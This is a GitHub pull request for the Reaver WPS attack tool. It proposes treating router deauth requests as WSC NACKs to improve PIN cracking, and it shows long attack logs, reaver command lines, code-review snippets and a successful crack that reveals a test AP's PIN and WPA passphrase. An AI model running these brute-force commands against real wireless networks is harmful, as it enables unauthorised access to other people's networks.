Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Treat the timeout as NACK if receive deauth request while waiting for M5/M7 #372

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Treat the timeout as NACK if receive deauth request while waiting for M5/M7 #372

wants to merge 1 commit into from

Conversation

feitoi
Copy link
Contributor

@feitoi feitoi commented May 10, 2023

I've already analyzed several situations with deauth request, it appears after Sending identity response, Sending M2 message, Sending M4 message, Sending M6 message, sometimes also receive WSC NACK after receive deauth request. Later I tested with routers with PIN already cracked and noticed that some routers are not sending WSC NACK instead of deauth request. With this knowledge I think it is possible to treat deauth request after Sending M4 message or Sending M6 message and got timeout as WSC NACK with new option -D to treat deauth request as WSC NACK

see an example with modified reaver with message count and PIN not cracked yet:

BSSID               Ch  dBm  WPS  Lck  Vendor    Progr  ESSID
--------------------------------------------------------------------------------
B8:5E:71:XX:XX:XX    1  -76  2.0  No   Broadcom   0.04  TestAP

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[+] Restored previous session
[+] Waiting for beacon from B8:5E:71:XX:XX:XX
[+] Received beacon from B8:5E:71:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received identity request (8)
[+] Sending identity response
[+] Received identity request (9)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (10)
[+] Sending identity response
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received identity request (15)
[+] Sending identity response
[+] Received identity request (16)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (17)
[+] Sending identity response
[+] Received identity request (18)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=1
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (5)
[+] Sending identity response
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (8)
[+] Sending identity response
[+] Received identity request (9)
[+] Sending identity response
[+] Received identity request (10)
[+] Sending identity response
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (15)
[+] Sending identity response
[+] Received identity request (16)
[+] Sending identity response
[+] Received identity request (17)
[+] Sending identity response
[+] Received identity request (18)
[+] Sending identity response
[+] Received identity request (19)
[+] Sending identity response
[+] Received identity request (20)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received deauth request
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received deauth request
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M3 message (6)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=48
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=1
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying DEFAULT PIN "62327145"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received identity request (6)
[+] Sending identity response
[+] Received identity request (7)
[+] Sending identity response
[+] Received identity request (8)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (9)
[+] Sending identity response
[+] Received identity request (10)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (11)
[+] Sending identity response
[+] Received identity request (12)
[+] Sending identity response
[+] Received identity request (13)
[+] Sending identity response
[+] Received identity request (14)
[+] Sending identity response
[+] Received identity request (15)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (16)
[+] Sending identity response
[+] Received identity request (17)
[+] Sending identity response
[+] Received deauth request
[+] Received identity request (18)
[+] Sending identity response
[+] Received identity request (19)
[+] Sending identity response
[+] Received identity request (20)
[+] Sending identity response
[+] Received identity request (21)
[+] Sending identity response
[+] Received identity request (22)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received deauth request
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received deauth request
[+] Received WSC NACK (reason: 0x0012) (deauth_flag=6)
[+] Sending WSC NACK
[+] Trying DEFAULT PIN "10864111"
[+] Sending authentication request
[+] Sending association request
[+] Associated with B8:5E:71:XX:XX:XX (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
......

Example with half PIN:

root@kali:~# reaver -i wlan0mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -p 7429 -t 35

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "74295678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received identity request (5)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M1 message (24)
[+] Received M1 message (25)
[+] Received M1 message (26)
[+] Received M1 message (27)
[+] Received M1 message (28)
[+] Received M1 message (29)
[+] Received M1 message (30)
[+] Received M1 message (31)
[+] Received M1 message (32)
[+] Received M1 message (33)
[+] Received M1 message (34)
[+] Received M1 message (35)
[+] Received M1 message (36)
[+] Received M1 message (37)
[+] Received M1 message (38)
[+] Received M1 message (39)
[+] Received M1 message (40)
[+] Received M1 message (41)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=111
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "74295678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received identity request (4)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M1 message (24)
[+] Received M1 message (25)
[+] Received M1 message (26)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M3 message (5)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=106
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Session saved.

Example with full PIN:

root@kali:~# reaver -i wlan0mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -p 7429548 -t 35

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y]
[+] Restored previous session
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "74295487"
[+] Sending authentication request
[+] Sending association request
[!] WARNING: Receive timeout occurred
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received identity request (1)
[+] Sending identity response
[+] Received identity request (2)
[+] Sending identity response
[+] Received identity request (3)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M1 message (6)
[+] Received M1 message (7)
[+] Received M1 message (8)
[+] Received M1 message (9)
[+] Received M1 message (10)
[+] Received M1 message (11)
[+] Received M1 message (12)
[+] Received M1 message (13)
[+] Received M1 message (14)
[+] Received M1 message (15)
[+] Received M1 message (16)
[+] Received M1 message (17)
[+] Received M1 message (18)
[+] Received M1 message (19)
[+] Received M1 message (20)
[+] Received M1 message (21)
[+] Received M1 message (22)
[+] Received M1 message (23)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received M3 message (1)
[+] Received M3 message (2)
[+] Received M3 message (3)
[+] Received M3 message (4)
[+] Received M5 message (0)
[+] Sending M6 message
[+] Received M5 message (1)
[+] Received M5 message (2)
[+] Received M5 message (3)
[+] Received M5 message (4)
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 55 seconds
[+] WPS PIN: '74295487'
[+] WPA PSK: 'password'
[+] AP SSID: 'TestAP 2.4 G'

see an example without PIN:

root@kali:~# reaver -i wlan2mon -b 8C:44:4F:XX:XX:XX -c 1 -vv -N -t 35          

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan2mon to channel 1
[?] Restore previous session for 8C:44:4F:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 8C:44:4F:XX:XX:XX
[+] Received beacon from 8C:44:4F:XX:XX:XX
[+] Vendor: Broadcom
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 8C:44:4F:XX:XX:XX (ESSID: TestAP 2.4 G)
[+] Sending EAPOL START request
[+] Received identity request (0)
[+] Sending identity response
[+] Received M1 message (0)
[+] Sending M2 message
[+] Received M1 message (1)
[+] Received M1 message (2)
[+] Received M1 message (3)
[+] Received M1 message (4)
[+] Received M1 message (5)
[+] Received M3 message (0)
[+] Sending M4 message
[+] Received deauth request
[!] WARNING: Receive timeout occurred
[++] deauth_flag=205
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Nothing done, nothing to save.

rofl0r
rofl0r reviewed May 11, 2023
View reviewed changes
src/exchange.c
* Treat the timeout as NACK if receive deauth request while waiting for M5/M7.
*/
else if (deauth_flag && (last_msg == M3 || last_msg == M5) && get_deauth_is_nack()) {
ret_val = KEY_REJECTED;
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

if we set this to REJECTED, wouldn't it mean that even though the pin could be correct when router sends deauth, next pin will be tried ?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Analyzing the first example this can happen, so the -D option is optional. We can override the -D option if we receive WSC NACK like the -J option.

/* in exchange.c */
	if(got_nack)
	{
		/*
		 * If a NACK message was received, then the current wps->state value will be
		 * SEND_WSC_NACK, indicating that we need to reply with a NACK. So check the
		 * previous state to see what state we were in when the NACK was received.
		 */
		if(last_msg == M3 || last_msg == M5)
		{
			/* The AP is properly sending WSC_NACKs, so don't treat future timeouts as pin failures. */
			set_timeout_is_nack(0);
			set_deauth_is_nack(0); /* override here */

			ret_val = KEY_REJECTED;

I still can't know much about the behavior of these routers to have better treatment because I don't have access to it, WPS Lock and I still don't know the first half PIN.

Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ah, sorry that i didn't mention it earlier, but my idea was not to introduce another command line option, but to always Do The Right Thing, in which case this behaviour would need to be fine-tuned

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

With WPS 2.0, it can't determine whether or not router sends deauth request instead of NACK in just a few attempts because the WPS LOCK.
The solution I thought would be to store the count of receiving deauth request without NACK in .wpc file.
If after 10 count, for example, not received any NACK then it can consider router sends deauth request instead of NACK.
The count starts with 0, increments with each deauth request without NACK, if receive NACK then store -1 that represents router sends NACK and ignore deauth request treatment.

rofl0r
rofl0r reviewed May 11, 2023
View reviewed changes
src/exchange.c
}
else
{
/* If we timed out at any other point in the session, then we need to try the pin again */
ret_val = RX_TIMEOUT;
}
/* Got timeout instead of an M5 message when cracking second half */
if (ret_val == KEY_REJECTED && !get_pin_string_mode() && last_msg == M3 && get_key_status() == KEY2_WIP) {
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

what about deauth after/before M1 ?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Analyzing the first example, deauth can appear in many steps, so if received before M1 or after M1 and before M3 also leave it as it is because after timeout reaver will restart the attempt.

@feitoi feitoi force-pushed the PR-feitoi branch 2 times, most recently from 1c28ca1 to f1cf73a Compare July 18, 2023 06:00
@feitoi
Tracks how many times timeouts with deauth request without NACK
13ff989 
Automatically treat the timeout as NACK if receive deauth request while waiting
for M5/M7 when deauth_is_nack_count >= MAX_DEAUTH_IS_NACK_COUNT and it have
never received WSC_NACK.
The count value is stored in .wpc file, the -1 equal the AP sends NACK.
@feitoi
Copy link
Contributor Author

feitoi commented Jul 18, 2023

After many observations, if receive deauth request before M3 then ends WPS transaction sending WSC_NACK and restart the attempt.
If receive deauth request after M3/M5 then waiting timeout and store the count value in .wpc file.
If after 10 times not received any NACK then it can consider router sends deauth request instead of NACK.
If receive NACK then store -1 that represents router sends NACK and ignore deauth request treatment.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@rofl0r rofl0r rofl0r left review comments

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@feitoi @rofl0r